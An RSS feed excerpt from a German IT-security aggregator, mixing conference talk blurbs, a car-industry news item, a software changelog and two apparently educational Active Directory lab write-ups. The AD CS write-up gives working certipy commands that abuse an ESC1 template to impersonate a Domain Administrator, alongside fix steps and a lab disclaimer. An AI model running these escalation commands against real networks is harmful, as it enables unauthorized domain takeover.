/u/Immediate_Ad_499 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v0anuh/fixed_csr8510barrot_bluetooth_clone_dongle/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v0anuh/fixed_csr8510barrot_bluetooth_clone_dongle/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Two Hobbyists, a Hedgehog Rescue, and an Exciting Hedgehog Tracking Project (Project HEDGE) (emf2026)]]></title>
<description><![CDATA[What began as a simple curiosity about what happens to rehabilitated hedgehogs after release slowly evolved into a long-term wildlife tracking system built from homemade electronics, trial and error, and a surprising amount of night time garden surveillance.

Using RFID tags, cameras, solar power...]]></description>
<link>https://tsecurity.de/de/3678230/it-security-video/two-hobbyists-a-hedgehog-rescue-and-an-exciting-hedgehog-tracking-project-project-hedge-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678230/it-security-video/two-hobbyists-a-hedgehog-rescue-and-an-exciting-hedgehog-tracking-project-project-hedge-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 18:34:31 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[What began as a simple curiosity about what happens to rehabilitated hedgehogs after release slowly evolved into a long-term wildlife tracking system built from homemade electronics, trial and error, and a surprising amount of night time garden surveillance.

Using RFID tags, cameras, solar power, tiny computers, and increasingly ambitious homemade electronics, the project aims to track the movements and behaviour of rehabilitated hedgehogs after release. The long-term hope is to grow the system into an open-source citizen science platform that other wildlife groups, makers, and curious hackers could build, adapt, and expand themselves.

Expect muddy field deployments, low-power electronics, strange bugs (both software and biological), unexpected toad visitors, occasional spider jump scares, questionable design decisions, and practical lessons learned while building technology that has to survive weather, wildlife, and volunteers armed with screwdrivers.

The data collected is now helping support wider wildlife research and improve understanding of hedgehog rehabilitation and behaviour. Underneath all the electronics, the real goal is simple: gathering better data to help hedgehogs survive and thrive.

Caution: this talk contains dangerously high levels of hedgehog cuteness, surprising wildlife stories, and a few simple ways people can help hedgehogs in their own gardens.

If you enjoy scrappy engineering, open hardware, wildlife, or watching hobby projects escalate dramatically, this talk is for you.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/209-two-hobbyists-a-hedgehog-rescue]]></content:encoded>
</item>
<item>
<title><![CDATA[Loop Engineering with Adaptive PDF Parsing: Start Cheap, Pay for a Heavier Parser Only When the Page Needs It]]></title>
<description><![CDATA[Enterprise Document Intelligence [Vol.1 #10A] - The escalation cascade and the free, deterministic checks that flag a failed parse before you pay for a deeper one
The post Loop Engineering with Adaptive PDF Parsing: Start Cheap, Pay for a Heavier Parser Only When the Page Needs It appeared first ...]]></description>
<link>https://tsecurity.de/de/3678167/ai-nachrichten/loop-engineering-with-adaptive-pdf-parsing-start-cheap-pay-for-a-heavier-parser-only-when-the-page-needs-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678167/ai-nachrichten/loop-engineering-with-adaptive-pdf-parsing-start-cheap-pay-for-a-heavier-parser-only-when-the-page-needs-it/</guid>
<pubDate>Sat, 18 Jul 2026 17:03:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise Document Intelligence [Vol.1 #10A] - The escalation cascade and the free, deterministic checks that flag a failed parse before you pay for a deeper one</p>
<p>The post <a href="https://towardsdatascience.com/loop-engineering-with-adaptive-pdf-parsing-start-cheap-pay-for-a-heavier-parser-only-when-the-page-needs-it/">Loop Engineering with Adaptive PDF Parsing: Start Cheap, Pay for a Heavier Parser Only When the Page Needs It</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The 'Death of the Stick Shift' is Almost Here for Americans]]></title>
<description><![CDATA[Last year just 0.6% of new vehicles made for U.S. customers were stick shifts, reports the Washington Post, citing preliminary government data. 

"That's a precipitous drop from the 34.6 percent of vehicles with manual transmissions produced in 1980."


[T]he stick shift's popularity hit multiple...]]></description>
<link>https://tsecurity.de/de/3678159/it-security-nachrichten/the-death-of-the-stick-shift-is-almost-here-for-americans/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678159/it-security-nachrichten/the-death-of-the-stick-shift-is-almost-here-for-americans/</guid>
<pubDate>Sat, 18 Jul 2026 16:52:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Last year just 0.6% of new vehicles made for U.S. customers were stick shifts, reports the Washington Post, citing preliminary government data. 

"That's a precipitous drop from the 34.6 percent of vehicles with manual transmissions produced in 1980."


[T]he stick shift's popularity hit multiple new lows in recent years, with no signs of a turnaround, thanks to new technologies and a rapidly changing marketplace. Buyers and automakers increasingly have turned to the sophisticated automatic drivetrains that now smoothly swap gears in fractions of a second and with better fuel efficiency. The average new vehicle today comes with seven gears, thanks to computers, twice as many as in 1980 and more gears than any ordinary driver would want to shift through using a manual gearbox. At the same time, sporty cars — the kind that buyers might demand a stick shift to drive — have fallen out of favor, replaced by interest in hulking SUVs, which are almost always automatics. The stick shift's demise has been hastened, too, by the rise of electric vehicles and increasingly autonomous vehicles. Neither have any need for a manual transmission... 


Europe has seen a less dramatic decline in stick shifts, with manual transmissions dropping from 91 percent of car registrations in 2001 to 29 percent in 2024 among Europe's largest auto markets, according to industry analyst JATO Dynamics... Subaru made its name with manual cars. But the Japanese automaker stopped offering a manual Crosstrek with the 2023 model year, having already dropped that transmission from its Legacy, Outback and Forester models. Other automakers have followed the same path. Volkswagen announced that it plans this year to ditch its last U.S. stick-shift model, the Jetta GLI. 

Even Toyota, Honda, and BMW have all reduced the number of cars for the U.S. market with a manual transmission, the article points out — leaving stick shift-loving Americans with a total of about 24 new-vehicle models to choose from. The articles adds that only 60% of Americans know how to drive a manual transmission (according to a survey from auto parts retailer AmericanMuscle): 83% for baby boomers but 39% for Gen Z. "Respondents were about evenly split on whether knowing how to drive a manual is an important life skill." 

But Ford CEO Jim Farley said earlier this year he has no plans to make the Mustang automatic-only.
"Out of our cold, dead hands will we not have a manual Mustang." Farley said.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=The+'Death+of+the+Stick+Shift'+is+Almost+Here+for+Americans%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F18%2F0239231%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F18%2F0239231%2Fthe-death-of-the-stick-shift-is-almost-here-for-americans%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/18/0239231/the-death-of-the-stick-shift-is-almost-here-for-americans?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[High-Power Rocketry on the Cheap (emf2026)]]></title>
<description><![CDATA[Rocketry is an expensive hobby. There are things you can do for cheap, but cutting costs too much can impact safety, or more importantly: fun. This is a guide for how you can have as much fun as possible, as safely as possible, without breaking the bank.

I'll take you through my journey running ...]]></description>
<link>https://tsecurity.de/de/3677913/it-security-video/high-power-rocketry-on-the-cheap-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677913/it-security-video/high-power-rocketry-on-the-cheap-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 13:32:50 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Rocketry is an expensive hobby. There are things you can do for cheap, but cutting costs too much can impact safety, or more importantly: fun. This is a guide for how you can have as much fun as possible, as safely as possible, without breaking the bank.

I'll take you through my journey running an under-funded uni rocketry society, competing on &lt;10% of the budget of our peers, and later how I continued with the hobby on my own. We'll touch on materials, manufacturing, makerspaces and more on our trip into the clouds; cross our fingers that our ejection charges and parachutes deploy at apogee; and venture into electronics both commercial and DIY to log our altitude and pop our main chute.

Rocketry is an incredibly multifaceted hobby with so much to explore and such a great community. My hope for this talk is that I convince a few more makers to try it out by covering the breadth of the hobby in enough detail to make it approachable.

Specific content includes:
- What are the engineering challenges?
- Material Science &amp; Composites
- Manufacturing methods
- Recovery
- Electronics, commercial and DIY
- How you can get involved in the hobby

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/52-high-power-rocketry-on-the-cheap]]></content:encoded>
</item>
<item>
<title><![CDATA[High-Power Rocketry on the Cheap (emf2026)]]></title>
<description><![CDATA[Rocketry is an expensive hobby. There are things you can do for cheap, but cutting costs too much can impact safety, or more importantly: fun. This is a guide for how you can have as much fun as possible, as safely as possible, without breaking the bank.

I'll take you through my journey running ...]]></description>
<link>https://tsecurity.de/de/3677903/it-security-video/high-power-rocketry-on-the-cheap-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677903/it-security-video/high-power-rocketry-on-the-cheap-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 13:18:38 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Rocketry is an expensive hobby. There are things you can do for cheap, but cutting costs too much can impact safety, or more importantly: fun. This is a guide for how you can have as much fun as possible, as safely as possible, without breaking the bank.

I'll take you through my journey running an under-funded uni rocketry society, competing on &lt;10% of the budget of our peers, and later how I continued with the hobby on my own. We'll touch on materials, manufacturing, makerspaces and more on our trip into the clouds; cross our fingers that our ejection charges and parachutes deploy at apogee; and venture into electronics both commercial and DIY to log our altitude and pop our main chute.

Rocketry is an incredibly multifaceted hobby with so much to explore and such a great community. My hope for this talk is that I convince a few more makers to try it out by covering the breadth of the hobby in enough detail to make it approachable.

Specific content includes:
- What are the engineering challenges?
- Material Science &amp; Composites
- Manufacturing methods
- Recovery
- Electronics, commercial and DIY
- How you can get involved in the hobby

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/52-high-power-rocketry-on-the-cheap]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Escalated to Domain Admin Using AD CS (And How to Fix It)]]></title>
<description><![CDATA[What is AD CS?Active Directory Certificate Services (AD CS) allows users and computers to obtain certificates for authentication, encryption, and other services.If certificate templates are misconfigured, attackers can request certificates for other users, including Domain Administrators, leading...]]></description>
<link>https://tsecurity.de/de/3677784/hacking/how-i-escalated-to-domain-admin-using-ad-cs-and-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677784/hacking/how-i-escalated-to-domain-admin-using-ad-cs-and-how-to-fix-it/</guid>
<pubDate>Sat, 18 Jul 2026 11:39:17 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IwcmPEl9c14DK-2hWY1W1g.png"></figure><h3>What is AD CS?</h3><p><strong>Active Directory Certificate Services (AD CS)</strong> allows users and computers to obtain certificates for authentication, encryption, and other services.</p><p>If certificate templates are misconfigured, attackers can request certificates for <strong>other users</strong>, including <strong>Domain Administrators</strong>, leading to privilege escalation.</p><p>In this lab, I exploited an <strong>ESC1</strong> certificate template misconfiguration.</p><h3>Lab Setup</h3><ul><li><strong>Domain:</strong> LAB.LOCAL</li><li><strong>Domain Controller:</strong> 192.168.56.104</li><li><strong>Certificate Authority:</strong> lab-DC1-CA</li><li><strong>Attacker:</strong> bob</li></ul><h3>Step 1 — Enumerate AD CS</h3><p>First, I looked for vulnerable certificate templates using <strong>Certipy</strong>.</p><pre>certipy-ad find -u bob@lab.local -p 'password@123' -dc-ip 192.168.56.104 -dc-host DC1.lab.local -target DC1.lab.local -ldap-scheme ldap -vulnerable -debug</pre><p>Certipy identified a vulnerable template named:</p><pre>ESC1-Lab</pre><p>This template allowed the requester to specify an arbitrary <strong>User Principal Name (UPN)</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MMCsemUil50u2bqrh-1jHA.png"></figure><h3>Step 2 — Request an Administrator Certificate</h3><p>Since the template was vulnerable, I requested a certificate while impersonating the <strong>Administrator</strong> account.</p><pre>certipy-ad req -u bob@lab.local -p 'Password@123' -ca lab-DC1-CA -template ESC1-Lab -upn Administrator@lab.local -dc-ip 192.168.56.104</pre><p>Certipy successfully issued an <strong>Administrator certificate</strong> and saved it as:</p><pre>administrator.pfx</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-_feIP7X-uB2A68CtwlfQA.png"></figure><h3>Step 3 — Authenticate as Administrator</h3><p>Finally, I authenticated using the issued certificate.</p><pre>certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.56.104</pre><p>Authentication succeeded, allowing me to impersonate the <strong>Domain Administrator</strong> without ever knowing the Administrator’s password.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vh8aenq802cDnuJT2GG2rQ.png"></figure><h3>Why Did This Work?</h3><p>The certificate template was vulnerable to <strong>ESC1</strong> because it:</p><ul><li>Allowed users to enroll.</li><li>Allowed the requester to supply any UPN.</li><li>Was trusted for client authentication.</li></ul><p>This meant Bob could request a certificate for <strong>Administrator@lab.local</strong> and authenticate as that user.</p><h3>How to Fix It</h3><p>To prevent ESC1 attacks:</p><p>1.Disable <strong>“Supply in the request”</strong> unless absolutely necessary.</p><p>2. Restrict enrollment permissions to trusted users.</p><p>3. Review certificate templates regularly.</p><p>4. Remove unnecessary Client Authentication EKUs.</p><p>5. Audit AD CS with tools like <strong>Certipy</strong> and <strong>BloodHound</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1022/1*nXg7Fgi0SkhyFf5sYadGyg.png"></figure><h3>Verify the Fix</h3><p>Run the enumeration again.</p><pre>certipy-ad find -u bob@lab.local -p 'password@123' -dc-ip 192.168.56.104 -vulnerable</pre><p>If the template is properly secured, <strong>ESC1-Lab</strong> should no longer appear as vulnerable.</p><h3>Key Takeaways</h3><p>1. Regularly audit AD CS templates.</p><p>2. Follow the principle of least privilege.</p><p>3. Restrict certificate enrollment permissions.</p><p>4. Monitor certificate enrollment events.</p><blockquote><strong><em>Disclaimer:</em></strong><em> This article is part of my Active Directory Lab Series. All demonstrations were performed in my self-hosted GOAD lab for educational and defensive purposes. Never perform these techniques on systems without proper authorization.</em></blockquote><p><em>— Written by</em></p><p><strong>Aruvasaga Chithan A</strong></p><p><strong>Ethical Hacker &amp; Cyber Security Researcher.</strong></p><p><strong>Thanks for reading — your support keeps me writing.</strong><br><strong>See you in the next article…</strong></p><p><a href="http://www.linkedin.com/in/aruvasaga-chithan"><em>Linkedin</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=a86cc69aed5a" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-escalated-to-domain-admin-using-ad-cs-and-how-to-fix-it-a86cc69aed5a">How I Escalated to Domain Admin Using AD CS (And How to Fix It)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Abused a Group Policy Object (GPO) in Active Directory (And How to Fix It)]]></title>
<description><![CDATA[Group Policy Objects (GPOs) are one of the most powerful features in Active Directory. They allow administrators to manage settings across computers and users.But if the wrong user has control over a GPO, it can become an easy privilege escalation path.In this lab, I’ll use BloodHound to identify...]]></description>
<link>https://tsecurity.de/de/3677783/hacking/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677783/hacking/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it/</guid>
<pubDate>Sat, 18 Jul 2026 11:39:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IYSV94Q4TKE53NHop9sBDw.png"></figure><p>Group Policy Objects (GPOs) are one of the most powerful features in Active Directory. They allow administrators to manage settings across computers and users.</p><p>But if the wrong user has control over a GPO, it can become an easy privilege escalation path.</p><p>In this lab, I’ll use <strong>BloodHound</strong> to identify a dangerous GPO permission and then show how to fix it.</p><h3>Lab Setup</h3><ul><li><strong>Domain:</strong> LAB.LOCAL</li><li><strong>Domain Controller:</strong> 192.168.56.104</li><li><strong>Attacker:</strong> Kali Linux</li><li><strong>User:</strong> bob</li></ul><h3>Step 1 — Collect Active Directory Data</h3><p>First, I collected information from Active Directory using <strong>BloodHound.py</strong>.</p><pre>bloodhound-python -u bob -p 'password@123' -d lab.local -ns 192.168.56.104 -c All --zip</pre><p>BloodHound successfully collected:</p><ul><li>8 Users</li><li>55 Groups</li><li>3 GPOs</li><li>2 OUs</li><li>1 Computer</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jA0bN8_u-FCRSuDjOdIbFg.png"></figure><h3>Step 2 — Import into BloodHound</h3><p>Next, I uploaded the generated ZIP file into BloodHound Community Edition.</p><p>BloodHound maps relationships between users, groups, computers, OUs, and GPOs, making it much easier to spot privilege escalation paths.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*T0gcQnP34CNfRQp0qFv4hw.png"></figure><h3>Step 3 — Finding the Misconfiguration</h3><p>BloodHound showed that <strong>Bob</strong> had <strong>WriteDacl</strong>, <strong>WriteOwner</strong>, and <strong>GenericWrite</strong> permissions over the <strong>Employees Policy</strong> GPO.</p><p>These permissions are dangerous because they allow a user to modify who controls the GPO or change its configuration.</p><h3>Why Is This Dangerous?</h3><p>If an attacker can edit a GPO linked to an Organizational Unit (OU), they may be able to:</p><ul><li>Execute scripts on domain computers</li><li>Deploy scheduled tasks</li><li>Add users to local Administrators</li><li>Push malicious registry changes</li><li>Gain higher privileges across the domain</li></ul><p>A single misconfigured GPO can impact many systems at once.</p><h3>Step 4 — Fixing the Issue</h3><p>On the Domain Controller:</p><pre>Group Policy Management<br>        ↓<br>Employees Policy<br>        ↓<br>Delegation</pre><p>Review who has permissions on the GPO.</p><p>Remove unnecessary permissions such as:</p><ul><li>GenericWrite</li><li>misconfiguredWriteDacl</li><li>WriteOwner</li></ul><p>Only trusted administrators should have these rights.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1021/1*FC8s8UA4FIWW0lay8j9Ikw.png"></figure><h3>Verify the Fix</h3><p>Run BloodHound again after updating the permissions.</p><pre>bloodhound-python -u bob -p 'password@123' -d lab.local -ns 192.168.56.104 -c All --zip</pre><p>Re-import the ZIP into BloodHound.</p><p>The dangerous permission edges should no longer appear for <strong>Bob</strong>.</p><h3>Key Takeaways</h3><p>1.Regularly audit GPO permissions.</p><p>2. Use the principle of least privilege.</p><p>3. Review BloodHound findings periodically.</p><p>4. Remove unnecessary <strong>GenericWrite</strong>, <strong>WriteDacl</strong>, and <strong>WriteOwner</strong> permissions.</p><blockquote><strong><em>Disclaimer:</em></strong><em> </em>The techniques demonstrated in this article were performed in a private Active Directory lab for learning purposes. Always obtain proper authorization before testing any production environment.</blockquote><p><em>— Written by</em></p><p><strong>Aruvasaga Chithan A</strong></p><p><strong>Ethical Hacker &amp; Cyber Security Researcher.</strong></p><p><strong>Thanks for reading — your support keeps me writing.</strong><br><strong>See you in the next article…</strong></p><p><a href="http://www.linkedin.com/in/aruvasaga-chithan"><em>Linkedin</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5d59c031e602" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it-5d59c031e602">How I Abused a Group Policy Object (GPO) in Active Directory (And How to Fix It)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Hidden Maths of Knitting (emf2026)]]></title>
<description><![CDATA[When someone mentions knitting, it’s unlikely that the first word to spring to mind is “mathematics”, but it turns out that fibre arts such as knitting and crochet have strands of mathematics woven into their very fabric. This talk is a journey through the history, geometry and topology of knitti...]]></description>
<link>https://tsecurity.de/de/3677724/it-security-video/the-hidden-maths-of-knitting-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677724/it-security-video/the-hidden-maths-of-knitting-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 10:49:00 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[When someone mentions knitting, it’s unlikely that the first word to spring to mind is “mathematics”, but it turns out that fibre arts such as knitting and crochet have strands of mathematics woven into their very fabric. This talk is a journey through the history, geometry and topology of knitting. Learn how crochet allowed us to visualise complex mathematical surfaces long before they could be studied with 3D computer models. Discover the careful computations behind beautiful knitted creations. Find out how the same punchcard technology that programmed early computers and took humans to the moon had its origins in weaving and is still used today in modern domestic knitting machines. Warning: this talk may provoke a desire to own more knitting machines than you currently do. No prior experience of knitting or maths is necessary to enjoy this talk, and yet there will be new ideas for even the most mathematically inclined fibre artists present!

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/84-the-hidden-maths-of-knitting]]></content:encoded>
</item>
<item>
<title><![CDATA[v17.0.4]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Fixed

Fixed Kimi Code usage reports dropping the 5h window reset time (omp usage showed no "resets in …" for the 5h limit): the API returns resetTime on the limit detail, not on window, so the parsed row-level reset is now carried onto the window when the window itself has none.
...]]></description>
<link>https://tsecurity.de/de/3677472/tools/v1704/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677472/tools/v1704/</guid>
<pubDate>Sat, 18 Jul 2026 07:22:41 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed Kimi Code usage reports dropping the 5h window reset time (<code>omp usage</code> showed no "resets in …" for the 5h limit): the API returns <code>resetTime</code> on the limit <code>detail</code>, not on <code>window</code>, so the parsed row-level reset is now carried onto the window when the window itself has none.</li>
<li>Made Kimi device-id persistence best-effort: a missing or unwritable <code>~/.omp/agent</code> directory no longer throws during Kimi header construction, which silently nulled every <code>kimi-code</code> usage probe on fresh installs.</li>
<li>Coerced boolean tool-schema subschemas to MFJS object forms for native Moonshot/Kimi endpoints, preventing the task tool's <code>outputSchema</code> field from causing HTTP 400 responses (<a href="https://github.com/can1357/oh-my-pi/issues/5952" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/5952/hovercard">#5952</a>).</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Changed</h3>
<ul>
<li>Kimi-family models now use MFJS tool schema on all hosts, including proxies like OpenRouter that forward schemas to Moonshot</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed bundled Linux ffmpeg recording by selecting its available ALSA input when PulseAudio support is absent, and surfaced recorder stderr when capture fails (<a href="https://github.com/can1357/oh-my-pi/issues/5907" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/5907/hovercard">#5907</a>).</li>
<li>Session load now skips the recursive async blob-ref resolver for entries with no <code>blob:sha256:</code> references. A cheap synchronous precheck gates the walk per entry (preserving the previous per-entry initiation order under synchronous store mutation), so text-heavy histories no longer pay the <code>Promise.all</code> tree descent for every non-session entry (<a href="https://github.com/can1357/oh-my-pi/issues/5922" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/5922/hovercard">#5922</a>).</li>
<li>Fixed <code>task</code> tool schemas emitting boolean subschemas that llama.cpp grammar generation cannot parse (<a href="https://github.com/can1357/oh-my-pi/issues/5957" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/5957/hovercard">#5957</a>).</li>
<li>Fixed the transcript keeping finalized assistant blocks in the live compose walk after their rows entered native terminal scrollback, making each stream tick's <code>TranscriptContainer.render</code> depth-linear in session length. Fully committed finalized blocks are now compacted out of the local frame regardless of post-finalize version tracking; a later mutation no longer recommits on ordinary frames (no duplication) and rehydrates on the next destructive full replay (no loss). Compose cost for a live tail tick is now flat as depth grows (<code>bench/transcript-compose.bench.ts</code>: ratio(N5000/N500) 2.30 → 0.90) (<a href="https://github.com/can1357/oh-my-pi/issues/5930" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/5930/hovercard">#5930</a>).</li>
<li>Fixed <code>/quit</code> and <code>/exit</code> hanging during interactive shutdown by making the mnemopi dispose path retain the current session and flush in-flight extractions without sleeping the bank; the <code>/memory enqueue</code> path and end-of-session backend enqueue still perform full cross-session consolidation. (<a href="https://github.com/can1357/oh-my-pi/issues/3641" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3641/hovercard">#3641</a>)</li>
</ul>
<h2>@oh-my-pi/hashline</h2>
<h3>Fixed</h3>
<ul>
<li>Rejected <code>DEL N:</code> headers with a trailing colon instead of silently tolerating the colon, so delete-with-body mistakes surface the corrective "has no colon" guidance.</li>
</ul>
<h2>@oh-my-pi/pi-mnemopi</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed a corrupt cached embedding model (truncated <code>model_optimized.onnx</code>, <code>Protobuf parsing failed</code> on load) permanently disabling local embeddings: init now quarantines the broken cache file (rename to <code>*.corrupt-&lt;ts&gt;</code>, only when the path resolves inside the fastembed cache directory) and retries once so the model re-downloads.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(mnemopi): self-heal a corrupt cached embedding model on init by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DarkPhilosophy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DarkPhilosophy">@DarkPhilosophy</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4915535326" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/5923" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/5923/hovercard" href="https://github.com/can1357/oh-my-pi/pull/5923">#5923</a></li>
<li>perf(session): gate blob-ref resolution behind synchronous precheck by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4915557895" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/5925" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/5925/hovercard" href="https://github.com/can1357/oh-my-pi/pull/5925">#5925</a></li>
<li>fix(task): avoid boolean output schema subschemas by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4916647111" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/5958" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/5958/hovercard" href="https://github.com/can1357/oh-my-pi/pull/5958">#5958</a></li>
<li>fix(stt): select a supported Linux ffmpeg input by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4914568211" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/5909" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/5909/hovercard" href="https://github.com/can1357/oh-my-pi/pull/5909">#5909</a></li>
<li>fix(tui): compact committed finalized transcript history by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4915924036" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/5943" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/5943/hovercard" href="https://github.com/can1357/oh-my-pi/pull/5943">#5943</a></li>
<li>fix(ai): normalize boolean tool schemas for Moonshot by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4916584073" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/5955" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/5955/hovercard" href="https://github.com/can1357/oh-my-pi/pull/5955">#5955</a></li>
